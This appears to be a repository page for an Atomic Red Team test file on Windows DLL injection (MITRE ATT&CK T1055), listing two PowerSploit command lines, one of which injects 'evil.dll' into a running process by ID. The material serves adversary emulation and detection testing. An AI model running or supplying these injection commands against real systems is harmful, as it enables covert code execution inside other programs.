Files
atomic-red-team/Windows/Privilege_Escalation/Process_Injection.md
T
Michael Haag 382d6313a3 Windows Matrix Update
Windows Matrix update
+ also fixed Dir names/paths
2018-01-16 10:10:52 -07:00

547 B

DLL Injection

MITRE ATT&CK Technique: T1055

Examples and code resource for PowerSploit

PowerShell Invoke-ReflectivePEInjection

Input:

C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1

Powershell Invoke-DllInjection

Input:

C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll